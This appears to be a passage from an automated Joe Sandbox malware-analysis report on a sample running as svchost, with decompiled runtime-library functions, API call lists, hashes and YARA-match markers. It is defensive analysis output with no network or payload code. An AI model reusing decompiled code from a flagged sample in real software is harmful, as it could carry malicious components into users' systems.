                                                0x6fd5d1da
                                                0x6fd5d1dc
                                                0x6fd5d1de
                                                0x00000000
                                                0x00000000
                                                0x6fd5d1e0
                                                0x00000000
                                                0x6fd5d1e0
                                                0x6fd5d176
                                                0x6fd5d17b
                                                0x00000000
                                                0x00000000
                                                0x6fd5d181
                                                0x6fd5d183
                                                0x00000000
                                                0x00000000
                                                0x6fd5d19a
                                                0x6fd5d19f
                                                0x6fd5d1a3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd5d1a9
                                                0x6fd5d0dc
                                                0x6fd5d0de
                                                0x6fd5d0e0
                                                0x6fd5d0e8
                                                0x6fd5d107
                                                0x6fd5d109
                                                0x6fd5d113
                                                0x6fd5d115
                                                0x6fd5d116
                                                0x6fd5d118
                                                0x00000000
                                                0x00000000
                                                0x6fd5d11e
                                                0x6fd5d124
                                                0x6fd5d124
                                                0x00000000
                                                0x6fd5d124
                                                0x6fd5d0ec
                                                0x6fd5d0f0
                                                0x6fd5d0f5
                                                0x6fd5d0f9
                                                0x00000000
                                                0x00000000
                                                0x6fd5d0ff
                                                0x00000000
                                                0x6fd5d0ff

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,6FD5D2AF,?,?,00000000), ref: 6FD5D0B8
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,6FD5D2AF,?,?,00000000,?,?,?), ref: 6FD5D13E
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,6FD5D2AF,?,?,00000000,?), ref: 6FD5D238
                                                • __freea.LIBCMT ref: 6FD5D245
                                                  • Part of subcall function 6FD59FEE: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6FD5DAC8,00000001,00000000,?,6FD5BCF0,00000001,00000004,00000000,00000001,?,?,6FD59BAA), ref: 6FD5A020
                                                • __freea.LIBCMT ref: 6FD5D24E
                                                • __freea.LIBCMT ref: 6FD5D273
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocHeap
                                                • String ID:
                                                • API String ID: 3147120248-0
                                                • Opcode ID: f5f73100e9912f53d4c0719b5b31767db8c7086f99b56c2c50ceca8c3dbb339e
                                                • Instruction ID: 5f8b9e7233712648e309d319dd646e38611fff1840f988ae4d499610a6a88799
                                                • Opcode Fuzzy Hash: f5f73100e9912f53d4c0719b5b31767db8c7086f99b56c2c50ceca8c3dbb339e
                                                • Instruction Fuzzy Hash: 7D51BE72604716ABEF558F64CC80EAB77AAEF86754F104629EC14DA180EB35FC61C670
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A7DE7 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,039A0A68,039A0A68,?,?,?,039A8038,00000001,00000001,56E85006), ref: 039A7E41
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,039A8038,00000001,00000001,56E85006,?,?,?), ref: 039A7EC7
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,56E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 039A7FC1
                                                • __freea.LIBCMT ref: 039A7FCE
                                                  • Part of subcall function 039A4899: RtlAllocateHeap.NTDLL(00000000,039920FE,73B76490), ref: 039A48CB
                                                • __freea.LIBCMT ref: 039A7FD7
                                                • __freea.LIBCMT ref: 039A7FFC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: b8fa516072fe5103e92ae7aa0c716d1f49d9b82f5b413f43a665ccd06f67de66
                                                • Instruction ID: 95db162cb0a7e080e3a8a68c3f83cbbd067f6bfe10fdf8b349ce91bc695739b3
                                                • Opcode Fuzzy Hash: b8fa516072fe5103e92ae7aa0c716d1f49d9b82f5b413f43a665ccd06f67de66
                                                • Instruction Fuzzy Hash: EF51D472600616ABDF25CFE8CC42EBFB7A9EB80690B194769FC14DA140EB34DD50C6A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A30D9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __cftoe
                                                • String ID:
                                                • API String ID: 4189289331-0
                                                • Opcode ID: e7ea6b83e55f996c052da18c126e7529230884ccf415145ba0366548f3257edf
                                                • Instruction ID: 2fe547ec4d432998bf1206145898447c8303e162b8698c379a1f9b4992df57f3
                                                • Opcode Fuzzy Hash: e7ea6b83e55f996c052da18c126e7529230884ccf415145ba0366548f3257edf
                                                • Instruction Fuzzy Hash: 7851FF7E904B05ABDB24DB9D8CC4EAFB7ADEF893B0F144319F8159A181DB31D50086E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD55F15 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E6FD55F15(void* __edx, void* __esi, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t36;
				intOrPtr _t38;
				void* _t39;

				_t35 = __edx;
				E6FD56580(0x6fd66800, 0xc);
				 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
				_t36 =  *((intOrPtr*)(_t39 + 0xc));
				if(_t36 == 1 || _t36 == 2) {
					_t33 =  *((intOrPtr*)(_t39 + 8));
					_t38 = E6FD5601E(_t33, _t36,  *((intOrPtr*)(_t39 + 0x10)));
					 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
					if(_t38 != 0) {
						_t38 = E6FD55D33(_t34, _t35, _t36, _t38, _t33, _t36,  *((intOrPtr*)(_t39 + 0x10)));
						 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
						if(_t38 != 0) {
							goto L5;
						}
					}
				} else {
					_t33 =  *((intOrPtr*)(_t39 + 8));
					L5:
					if(_t36 == 1) {
						E6FD576D4(_t36, _t38, _t33);
						_pop(_t34);
					}
					_push( *((intOrPtr*)(_t39 + 0x10)));
					_push(_t36);
					_push(_t33);
					_t25 = E6FD55660();
					_t38 = _t25;
					 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
					if(_t36 != 1) {
						L12:
						if(_t36 != 0) {
							goto L14;
						} else {
							goto L13;
						}
					} else {
						if(_t38 == 0) {
							_push( *((intOrPtr*)(_t39 + 0x10)));
							_push(_t25);
							_push(_t33);
							E6FD55660();
							E6FD55D33(_t34, _t35, _t36, _t38, _t33, _t38,  *((intOrPtr*)(_t39 + 0x10)));
							E6FD5601E(_t33, _t38,  *((intOrPtr*)(_t39 + 0x10)));
						}
						if(_t36 != 1 || _t38 != 0) {
							goto L12;
						} else {
							L13:
							E6FD57770(_t36, _t38, _t33);
							_pop(_t34);
							if(_t36 == 0) {
								L15:
								_t38 = E6FD55D33(_t34, _t35, _t36, _t38, _t33, _t36,  *((intOrPtr*)(_t39 + 0x10)));
								 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
								if(_t38 != 0) {
									_t38 = E6FD5601E(_t33, _t36,  *((intOrPtr*)(_t39 + 0x10)));
									 *((intOrPtr*)(_t39 - 0x1c)) = _t38;
								}
							} else {
								L14:
								if(_t36 == 3) {
									goto L15;
								}
							}
						}
					}
				}
				 *(_t39 - 4) = 0xfffffffe;
				return E6FD565C6();
			}










                                                0x6fd55f15
                                                0x6fd55f1c
                                                0x6fd55f21
                                                0x6fd55f25
                                                0x6fd55f2b
                                                0x6fd55f3b
                                                0x6fd55f44
                                                0x6fd55f46
                                                0x6fd55f4b
                                                0x6fd55f5b
                                                0x6fd55f5d
                                                0x6fd55f62
                                                0x00000000
                                                0x00000000
                                                0x6fd55f62
                                                0x6fd55f32
                                                0x6fd55f32
                                                0x6fd55f68
                                                0x6fd55f6b
                                                0x6fd55f6e
                                                0x6fd55f73
                                                0x6fd55f73
                                                0x6fd55f74
                                                0x6fd55f77
                                                0x6fd55f78
                                                0x6fd55f79
                                                0x6fd55f7e
                                                0x6fd55f80
                                                0x6fd55f86
                                                0x6fd55fb3
                                                0x6fd55fb5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd55f88
                                                0x6fd55f8a
                                                0x6fd55f8c
                                                0x6fd55f8f
                                                0x6fd55f90
                                                0x6fd55f91
                                                0x6fd55f9b
                                                0x6fd55fa5
                                                0x6fd55fa5
                                                0x6fd55fad
                                                0x00000000
                                                0x6fd55fb7
                                                0x6fd55fb7
                                                0x6fd55fb8
                                                0x6fd55fbd
                                                0x6fd55fc0
                                                0x6fd55fc7
                                                0x6fd55fd1
                                                0x6fd55fd3
                                                0x6fd55fd8
                                                0x6fd55fe4
                                                0x6fd5600c
                                                0x6fd5600c
                                                0x6fd55fc2
                                                0x6fd55fc2
                                                0x6fd55fc5
                                                0x00000000
                                                0x00000000
                                                0x6fd55fc5
                                                0x6fd55fc0
                                                0x6fd55fad
                                                0x6fd55f86
                                                0x6fd5600f
                                                0x6fd5601d

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: dllmain_crt_dispatchdllmain_raw
                                                • String ID:
                                                • API String ID: 1382799047-0
                                                • Opcode ID: f22b9ff9f69318839f0f2d39f0803547a8917c67f586a2b74300033f31e2b651
                                                • Instruction ID: db31b32847f3fd97f38f04512986f906252182638ccfeb4a6d77c570ce360492
                                                • Opcode Fuzzy Hash: f22b9ff9f69318839f0f2d39f0803547a8917c67f586a2b74300033f31e2b651
                                                • Instruction Fuzzy Hash: AA217F72D05755EBCFA28F6C8D40A9F3A69AF46768B050609FC246B245CB35F9309BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03999923 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03999934
                                                • int.LIBCPMT ref: 0399994B
                                                  • Part of subcall function 03992750: std::_Lockit::_Lockit.LIBCPMT ref: 03992761
                                                  • Part of subcall function 03992750: std::_Lockit::~_Lockit.LIBCPMT ref: 0399277B
                                                • codecvt.LIBCPMT ref: 0399996E
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0399998B
                                                • std::_Facet_Register.LIBCPMT ref: 039999AA
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 039999B3
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrowcodecvt
                                                • String ID:
                                                • API String ID: 3298841034-0
                                                • Opcode ID: 48fa8e519eedfbacb21eb22b1dc0a01de4011c5b188affc5a073a8f6df6adbb4
                                                • Instruction ID: ddae724f40b9b85b0bdab6d89b472cfba8095a3d9f0d6898f03cfe850e501e90
                                                • Opcode Fuzzy Hash: 48fa8e519eedfbacb21eb22b1dc0a01de4011c5b188affc5a073a8f6df6adbb4
                                                • Instruction Fuzzy Hash: 88015B3A9013199BEF05EB68C9409BEB77DAFC4650F19084AD5617F290DF35AD0187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5B10A Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E6FD5B10A(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6fd6952c; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6FD5A03C(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6FD5A57C(_t25, __eflags,  *0x6fd6952c, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6FD5AF50(_t25, _t31, 0x6fd6b568);
							E6FD59FB4(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6FD59FB4();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6FD59F17(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6fd6952c; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6FD5A03C(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6FD5A57C(_t27, __eflags,  *0x6fd6952c, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6FD5AF50(_t27, _t32, 0x6fd6b568);
									E6FD59FB4(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6FD59FB4();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6FD5A526(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6FD5A526(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                0x6fd5b10a
                                                0x6fd5b10a
                                                0x6fd5b10a
                                                0x6fd5b114
                                                0x6fd5b116
                                                0x6fd5b11b
                                                0x6fd5b11e
                                                0x6fd5b12c
                                                0x6fd5b133
                                                0x6fd5b138
                                                0x6fd5b13b
                                                0x6fd5b13e
                                                0x6fd5b150
                                                0x6fd5b155
                                                0x6fd5b157
                                                0x6fd5b162
                                                0x6fd5b169
                                                0x6fd5b16e
                                                0x6fd5b171
                                                0x6fd5b173
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd5b159
                                                0x6fd5b159
                                                0x00000000
                                                0x6fd5b159
                                                0x6fd5b140
                                                0x6fd5b140
                                                0x6fd5b141
                                                0x6fd5b141
                                                0x6fd5b146
                                                0x6fd5b181
                                                0x6fd5b182
                                                0x6fd5b188
                                                0x6fd5b18d
                                                0x6fd5b190
                                                0x6fd5b191
                                                0x6fd5b192
                                                0x6fd5b199
                                                0x6fd5b19b
                                                0x6fd5b19d
                                                0x6fd5b1a2
                                                0x6fd5b1a5
                                                0x6fd5b1b3
                                                0x6fd5b1bf
                                                0x6fd5b1c2
                                                0x6fd5b1c5
                                                0x6fd5b1d7
                                                0x6fd5b1dc
                                                0x6fd5b1de
                                                0x6fd5b1e9
                                                0x6fd5b1ef
                                                0x6fd5b1f7
                                                0x6fd5b1f9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd5b1e0
                                                0x6fd5b1e0
                                                0x00000000
                                                0x6fd5b1e0
                                                0x6fd5b1c7
                                                0x6fd5b1c7
                                                0x6fd5b1c8
                                                0x6fd5b1c8
                                                0x6fd5b1fb
                                                0x6fd5b1fc
                                                0x6fd5b1fc
                                                0x6fd5b1a7
                                                0x6fd5b1ad
                                                0x6fd5b1b1
                                                0x6fd5b204
                                                0x6fd5b205
                                                0x6fd5b20b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd5b1b1
                                                0x6fd5b212
                                                0x6fd5b212
                                                0x6fd5b120
                                                0x6fd5b126
                                                0x6fd5b12a
                                                0x6fd5b175
                                                0x6fd5b176
                                                0x6fd5b180
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd5b12a

                                                APIs
                                                • GetLastError.KERNEL32(?,00000000,6FD58E31,00000000,?,?,6FD59013,00000104,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost), ref: 6FD5B10E
                                                • _free.LIBCMT ref: 6FD5B141
                                                • _free.LIBCMT ref: 6FD5B169
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost,?,00000104,FunctionProtocolHost,?,00000104), ref: 6FD5B176
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00000000,?,6FD556A6,FunctionProtocolHost,?,00000104,FunctionProtocolHost,?,00000104), ref: 6FD5B182
                                                • _abort.LIBCMT ref: 6FD5B188
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: 98bcdb0fc2f41aff90efe429d816ee3ef42968ef2859a63ffdd9b56df385767b
                                                • Instruction ID: 8215cae72bdbe9d3cf710bcc9089ea02bacdc8869038756dc2140c6d690cba4b
                                                • Opcode Fuzzy Hash: 98bcdb0fc2f41aff90efe429d816ee3ef42968ef2859a63ffdd9b56df385767b
                                                • Instruction Fuzzy Hash: 65F06D77548B10A6DFC253345904E5A2629DF87779F240215F614962C5EF20F4365571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A5EE2 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                • _free.LIBCMT ref: 039A5F19
                                                • _free.LIBCMT ref: 039A5F41
                                                • SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F4E
                                                • SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                • _abort.LIBCMT ref: 039A5F60
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: aa5fd8d0af262c8777b01eec6520f4fb13e9cd57beafb5f3e7894b6081b36852
                                                • Instruction ID: 442a11672497b869994aea6f3830fd93569adb874814a5a3feaa6edfc6ccb9b2
                                                • Opcode Fuzzy Hash: aa5fd8d0af262c8777b01eec6520f4fb13e9cd57beafb5f3e7894b6081b36852
                                                • Instruction Fuzzy Hash: C0F0817A74CF0067D611F26E6D08B2B266D9BC25A1B1B0314F595EE286FE70C80195E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03991BA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130COMMON
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 03991C1F
                                                  • Part of subcall function 03998FB3: __CxxThrowException@8.LIBVCRUNTIME ref: 03998FCA
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 03991C32
                                                • new.LIBCMT ref: 03991C38
                                                • new.LIBCMT ref: 03991C55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                • String ID: 2\taskmgr.exe
                                                • API String ID: 3339364867-3441168942
                                                • Opcode ID: 46cd34651673b88bdc35c1c173cc30a65f05f3142bb5f92eb62cdf836264acb8
                                                • Instruction ID: 56c08db777a10d2661d97c4613ab1c6523faef47fa7d3b2356c8e23a96dad468
                                                • Opcode Fuzzy Hash: 46cd34651673b88bdc35c1c173cc30a65f05f3142bb5f92eb62cdf836264acb8
                                                • Instruction Fuzzy Hash: 4541D474A007069FEF24DF6CC58266AFBE9FB45250F540A2FE856CB380E7709944C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD57540 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E6FD57540(void* __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				WCHAR* _v36;
				struct HINSTANCE__* _v40;
				void* __edi;
				void* __esi;
				void* _t54;
				long _t56;
				signed int _t62;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t67;
				long _t69;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t76;
				char _t78;
				void* _t90;
				intOrPtr _t91;
				WCHAR* _t93;
				intOrPtr _t96;
				long _t98;
				intOrPtr* _t100;
				void* _t103;
				void* _t104;
				void* _t110;

				_t72 = _a8;
				_push(_t90);
				_v5 = 0;
				_t96 = _t72 + 0x10;
				_push(_t96);
				_v16 = 1;
				_v20 = _t96;
				_v12 =  *(_t72 + 8) ^  *0x6fd68008;
				_t54 = E6FD57500(_t90, _t96,  *(_t72 + 8) ^  *0x6fd68008);
				_t91 = _a12;
				_push(_t91);
				E6FD5670E(_t54);
				_t56 = _a4;
				_t104 = _t103 + 0xc;
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - 0xfffffffe;
					if( *((intOrPtr*)(_t72 + 0xc)) != 0xfffffffe) {
						E6FD58B67(_t72, 0xfffffffe, _t96, 0x6fd68008);
						goto L18;
					}
					goto L19;
				} else {
					_v32 = _t56;
					_v28 = _t91;
					_t91 =  *((intOrPtr*)(_t72 + 0xc));
					 *((intOrPtr*)(_t72 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L19:
						return _v16;
					} else {
						do {
							_t76 = _v12;
							_t19 = _t91 + 2; // 0x3
							_t62 = _t91 + _t19 * 2;
							_t74 =  *((intOrPtr*)(_t76 + _t62 * 4));
							_t63 = _t76 + _t62 * 4;
							_t77 =  *((intOrPtr*)(_t63 + 4));
							_v24 = _t63;
							if( *((intOrPtr*)(_t63 + 4)) == 0) {
								_t78 = _v5;
								goto L12;
							} else {
								_t64 = E6FD58B1E(_t77, _t96);
								_t78 = 1;
								_v5 = 1;
								_t110 = _t64;
								if(_t110 < 0) {
									_v16 = 0;
									L18:
									_push(_t96);
									E6FD57500(_t91, _t96, _v12);
									goto L19;
								} else {
									if(_t110 <= 0) {
										goto L12;
									} else {
										_t65 = _a4;
										if( *_a4 == 0xe06d7363) {
											_t112 =  *0x6fd614ac;
											if( *0x6fd614ac != 0) {
												_t65 = E6FD5F960(_t112, 0x6fd614ac);
												_t104 = _t104 + 4;
												if(_t65 != 0) {
													_t100 =  *0x6fd614ac; // 0x6fd5670f
													L6FD56575();
													_t65 =  *_t100(_a4, 1);
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
											}
										}
										E6FD58B4E(_t65, _a8, _a4);
										_t67 = _a8;
										if( *((intOrPtr*)(_t67 + 0xc)) != _t91) {
											E6FD58B67(_t67, _t91, _t96, 0x6fd68008);
											_t67 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t67 + 0xc)) = _t74;
										E6FD57500(_t91, _t96, _v12);
										E6FD58B35();
										asm("int3");
										_push(_t96);
										_t98 = _v32;
										_push(_t91);
										_t93 = _v36;
										_t69 = GetModuleFileNameW(_v40, _t93, _t98);
										if(_t98 != 0) {
											if(_t69 == 0) {
												 *_t93 = 0;
											}
											if(_t69 == _t98) {
												_t69 = GetLastError();
												if(_t69 == 0) {
													 *(_t93 + _t98 * 2 - 2) = _t69;
												}
											}
										}
										return _t69;
									}
								}
							}
							goto L29;
							L12:
							_t91 = _t74;
							__eflags = _t74 - 0xfffffffe;
						} while (_t74 != 0xfffffffe);
						__eflags = _t78;
						if(_t78 != 0) {
							goto L18;
						}
						goto L19;
					}
				}
				L29:
			}


































                                                0x6fd57547
                                                0x6fd5754b
                                                0x6fd5754c
                                                0x6fd57553
                                                0x6fd5755c
                                                0x6fd5755e
                                                0x6fd57565
                                                0x6fd57568
                                                0x6fd5756b
                                                0x6fd57570
                                                0x6fd57573
                                                0x6fd57574
                                                0x6fd57579
                                                0x6fd5757c
                                                0x6fd57583
                                                0x6fd5763d
                                                0x6fd57641
                                                0x6fd57650
                                                0x00000000
                                                0x6fd57650
                                                0x00000000
                                                0x6fd57589
                                                0x6fd57589
                                                0x6fd5758f
                                                0x6fd57592
                                                0x6fd57595
                                                0x6fd5759b
                                                0x6fd57661
                                                0x6fd5766a
                                                0x6fd575a1
                                                0x6fd575a1
                                                0x6fd575a1
                                                0x6fd575a4
                                                0x6fd575a7
                                                0x6fd575aa
                                                0x6fd575ad
                                                0x6fd575b0
                                                0x6fd575b3
                                                0x6fd575b8
                                                0x6fd57620
                                                0x00000000
                                                0x6fd575ba
                                                0x6fd575bc
                                                0x6fd575c1
                                                0x6fd575c3
                                                0x6fd575c6
                                                0x6fd575c8
                                                0x6fd57634
                                                0x6fd57655
                                                0x6fd57655
                                                0x6fd57659
                                                0x00000000
                                                0x6fd575ca
                                                0x6fd575ca
                                                0x00000000
                                                0x6fd575cc
                                                0x6fd575cc
                                                0x6fd575d5
                                                0x6fd575d7
                                                0x6fd575de
                                                0x6fd575e5
                                                0x6fd575ea
                                                0x6fd575ef
                                                0x6fd575f1
                                                0x6fd575fe
                                                0x6fd57603
                                                0x6fd57605
                                                0x6fd57608
                                                0x6fd57608
                                                0x6fd575ef
                                                0x6fd575de
                                                0x6fd57611
                                                0x6fd57616
                                                0x6fd5761c
                                                0x6fd57675
                                                0x6fd5767a
                                                0x6fd5767a
                                                0x6fd5767d
                                                0x6fd57681
                                                0x6fd57684
                                                0x6fd57694
                                                0x6fd57699
                                                0x6fd5769d
                                                0x6fd5769e
                                                0x6fd576a1
                                                0x6fd576a2
                                                0x6fd576aa
                                                0x6fd576b2
                                                0x6fd576b6
                                                0x6fd576ba
                                                0x6fd576ba
                                                0x6fd576bf
                                                0x6fd576c1
                                                0x6fd576c9
                                                0x6fd576cb
                                                0x6fd576cb
                                                0x6fd576c9
                                                0x6fd576bf
                                                0x6fd576d3
                                                0x6fd576d3
                                                0x6fd575ca
                                                0x6fd575c8
                                                0x00000000
                                                0x6fd57623
                                                0x6fd57623
                                                0x6fd57625
                                                0x6fd57625
                                                0x6fd5762e
                                                0x6fd57630
                                                0x00000000
